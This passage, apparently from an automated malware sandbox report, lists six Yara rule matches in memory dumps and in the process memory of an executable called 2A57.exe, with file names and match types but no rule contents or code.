Source: Yara match File source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.305829321.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2A57.exe PID: 4476, type: MEMORYSTR